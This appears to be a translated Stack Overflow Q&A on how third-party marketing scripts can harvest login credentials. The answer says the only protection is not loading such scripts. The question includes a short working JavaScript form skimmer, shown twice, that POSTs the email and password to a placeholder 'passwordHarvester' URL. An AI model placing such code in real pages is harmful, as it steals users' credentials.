英文:
Login Form Password Security
问题
如果以下的JavaScript代码被添加到stackoverflow.com的登录页面中,那么每次浏览器点击登录时,输入的表单数据将通过POST请求发送到第三方网站。我认为这在许多其他网站上也可能很常见。随着像Google Tag Manager这样的现代"营销工具"的普及,网站所有者如何确保像下面这样的小脚本片段不会秘密收集客户数据呢?网站是否可以采取措施加密表单框中输入的密码?
我唯一想到的是要求营销部门想要实施的跟踪代码进行彻底审查。有人能帮助我理解是否存在更加优雅的解决方案吗?
const elementToTrack = document.querySelector('#submit-button');
elementToTrack.addEventListener('click', () => {
getPW();
});
function getPW() {
var data = new FormData(document.getElementById('login-form'));
data = data.entries();
var obj = data.next();
var retrieved = {};
while (undefined !== obj.value) {
retrieved[obj.value[0]] = obj.value[1];
obj = data.next();
}
let pw = retrieved.password;
let email = retrieved.email;
/*just using a placeholder url for illustrative purposes */
fetch("https://somerandomserver.com/api/passwordHarvester", {
method: "POST",
body: JSON.stringify({
email: email,
password: pw
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
});
}
不要翻译代码部分。
英文:
If the following JavaScript code was added into the stackoverflow.com login page then each time a browser clicked login, the form data entered would be sent off a third party website via a post request. I think this may be common on a lot of other websites as well. With the modern proliferation of "marketing tools" like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data? Can websites do anything to encrypt the password entered within the form box?
The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement. Can someone please help me understand if a more elegant solution exists?
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-js -->
const elementToTrack = document.querySelector('#submit-button');
elementToTrack.addEventListener('click', () => {
getPW();
});
function getPW() {
var data = new FormData( document.getElementById('login-form') );
data = data.entries();
var obj = data.next();
var retrieved = {};
while(undefined !== obj.value) {
retrieved[obj.value[0]] = obj.value[1];
obj = data.next();
}
let pw = retrieved.password;
let email = retrieved.email;
/*just using a placeholder url for illustrative purposes */
fetch("https://somerandomserver.com/api/passwordHarvester", {
method: "POST",
body: JSON.stringify({
email: email,
password: pw
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
});
}
<!-- end snippet -->
答案1
得分: 1
只有不使用它们。
从他人控制的 URL 加载和执行 JavaScript 会给他们与您自己编写的任何 JS 一样多的访问权限。
不能。
浏览器内置的加密只涉及 HTTP 请求和响应(即 HTTPS)。
任何您在 JavaScript 中执行的操作都可能受到第三方 JavaScript 的干扰或被其抢占。
我唯一能想到的是要求市场部门要实施的跟踪代码进行彻底审查。
由于 JavaScript 由第三方托管,审查后他们可以更改它(或根据源 IP、用户代理或其他内容提供不同的 JS),无法阻止这些更改。
英文:
> With the modern proliferation of "marketing tools" like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data?
Only by not using them.
Load and execute JavaScript from a URL under someone else's control give them as much access to your page as any JS you write yourself has.
> Can websites do anything to encrypt the password entered within the form box?
No.
Browser built-in encryption only concerns itself with the HTTP requests and responses (i.e. HTTPS).
Anything you did with JavaScript would be subject to interference from or could be preempted by the third-party JS.
> The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement.
Since the JS his hosted by the third-party, there would be nothing stopping them changing it after the review (or serving different JS based on the source IP, user-agent, or whatever).
通过集体智慧和协作来改善编程学习和解决问题的方式。致力于成为全球开发者共同参与的知识库,让每个人都能够通过互相帮助和分享经验来进步。
评论